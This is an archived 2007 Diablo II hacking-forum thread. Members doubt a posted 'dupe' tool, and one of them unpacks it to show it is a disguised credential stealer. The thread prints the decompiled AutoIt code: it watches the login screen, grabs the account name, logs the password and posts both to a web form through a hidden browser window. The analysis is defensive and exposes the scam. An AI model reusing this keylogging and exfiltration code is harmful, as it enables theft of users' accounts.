+- Blizzard Sector (https://www.blizzsector.co)
+-- Forum: Diablo II (https://www.blizzsector.co/forum-4.html)
+--- Forum: Hacks Bots and Editors (https://www.blizzsector.co/forum-16.html)
+--- Thread: Working Dupe!? (/thread-40226.html)
Working Dupe!? - azndude108 - 07-15-2007
Sup guys, i dont know if this dupe works or not. I have the file, but i do not know if it is key logged or anything.
~link removed
Next time, please PM a mod (preferably one of the mods that would know anything about this kind of stuff) so links aren't just floating around the forum for a random user to contract. Thanx.
-closed
Working Dupe!? - Nex - 07-15-2007
that look good, but i can just about gaurentee that its fake. and its just another pathetic scam to get ur account and ur cdkeys...
Working Dupe!? - Blue - 07-16-2007
Was it free?
And you could always send it to someone asking for a scan of it. I'm sure some lovely mods or someone would love to do it.
Working Dupe!? - allstarb - 07-17-2007
That is for sure real
If the guy was a 10 year old and didn't know he could make thousands off selling mass tyrael mights .
Working Dupe!? - necronomikron - 07-17-2007
Certainly interesting, though I find it suspicious that the comments are disabled.
Working Dupe!? - spartand117 - 07-17-2007
well i normally say dupes r fake but it looks a little real prolly a drophack but can ne one unzip it i cant i was goona scan
Working Dupe!? - John - 07-17-2007
impossible. very likely a mod on open battle.net + closed video put together.
Working Dupe!? - Blue - 07-17-2007
John Wrote:impossible. very likely a mod on open battle.net + closed video put together.
Wow, people are getting smarter nowadays.
Working Dupe!? - spartand117 - 07-17-2007
just someone unzip it and ill tell what it is in 3 secs
Working Dupe!? - necronomikron - 07-17-2007
I'm looking at it w/ a hex editor. Looks like he attempted to obfuscate it by upx compressing it. Fooled me for about 5 seconds... decompressed it and it is an autoit script.
Edit: I know exactly what it's doing... I decompiled the script and this is near the end:
Code:
While 1
If WinActive("Diablo II") Then
Select
Case $stage = 0
If PixelGetColor(504,304) <> $stop OR $stop1 Then
$stage = 1
EndIf
Case $stage = 1
If PixelGetColor(504,304) = $stop OR $stop1 Then
$stage = 2
Send("{TAB}" & "^C" & "^C" & "^C" & "^C" & "{TAB}")
$account = ClipGet()
EndIf
Case $stage = 2
$pass = ""
Do
_logpass()
Until PixelGetColor(504,304) <> $stop OR $stop1
$stage = 0
_sendaway()
EndSelect
EndIf
Sleep(50)
WEndIt then proceeds to do keylogging and then submits it via:
Code:
Func _sendaway()
$sURL = "snipurl -- edited to be able to post this, needless to say, it signs a guestbook"
$oIE = _IECreate($sURL,0,0)
$oForm = _IEFormGetObjByName($oIE,"post")
$oText = _IEFormElementGetObjByName ($oForm, "form_message")
_IEFormElementSetValue ($oText,$account & "||||" & $pass)
_IEFormSubmit ($oForm)
_IEQuit($oIE)
EndFuncWorking Dupe!? - Pamela - 07-18-2007
azndude108
Nice try...cya